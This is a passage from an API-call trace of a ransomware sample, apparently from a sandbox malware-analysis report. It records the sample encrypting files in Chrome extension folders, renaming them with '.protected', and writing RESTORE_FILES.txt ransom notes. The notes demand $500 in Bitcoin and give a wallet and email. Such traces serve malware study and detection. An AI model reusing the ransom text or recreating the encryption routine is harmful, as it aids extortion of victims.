hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.445] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.445] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd4, lpOverlapped=0x0) returned 1 [0080.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.446] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.446] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.446] CloseHandle (hObject=0x168) returned 1 [0080.446] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected") returned 165 [0080.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\messages.json.protected")) returned 1 [0080.447] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.447] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.447] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\RESTORE_FILES.txt") returned 159 [0080.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.447] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.447] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.449] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.449] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.449] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.449] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.449] CloseHandle (hObject=0x164) returned 1 [0080.449] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Windows") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Program Files") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="Program Files (x86)") returned -1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="$Recycle.bin") returned 1 [0080.449] lstrcmpiW (lpString1="eu", lpString2="System Volume Information") returned -1 [0080.449] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu") returned 141 [0080.449] lstrcmpW (lpString1="eu", lpString2=".") returned 1 [0080.449] lstrcmpW (lpString1="eu", lpString2="..") returned 1 [0080.449] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*") returned 143 [0080.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.459] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.459] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.459] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\.") returned 143 [0080.459] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.459] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.459] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.459] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.459] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\..") returned 144 [0080.459] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.459] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.459] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.459] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.459] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.460] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.460] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.460] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.460] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.460] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json") returned 155 [0080.460] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.461] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x98, lpOverlapped=0x0) returned 1 [0080.461] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.461] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x98, lpOverlapped=0x0) returned 1 [0080.462] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.462] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.462] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.462] CloseHandle (hObject=0x168) returned 1 [0080.462] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected") returned 165 [0080.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\messages.json.protected")) returned 1 [0080.463] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.463] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\RESTORE_FILES.txt") returned 159 [0080.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\eu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.464] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.464] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.464] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.464] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.465] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.465] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.465] CloseHandle (hObject=0x164) returned 1 [0080.465] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Windows") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Program Files") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="Program Files (x86)") returned -1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="$Recycle.bin") returned 1 [0080.465] lstrcmpiW (lpString1="fa", lpString2="System Volume Information") returned -1 [0080.465] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa") returned 141 [0080.465] lstrcmpW (lpString1="fa", lpString2=".") returned 1 [0080.465] lstrcmpW (lpString1="fa", lpString2="..") returned 1 [0080.465] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*") returned 143 [0080.465] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.465] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.465] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\.") returned 143 [0080.466] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.466] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.466] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\..") returned 144 [0080.466] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.466] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.466] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.466] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.466] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.466] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.466] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.466] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.466] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.467] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\messages.json") returned 155 [0080.467] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.467] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xff, lpOverlapped=0x0) returned 1 [0080.468] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 